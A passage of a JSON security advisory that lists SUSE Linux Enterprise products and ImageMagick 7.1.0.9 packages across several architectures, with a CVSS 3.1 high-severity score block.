"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
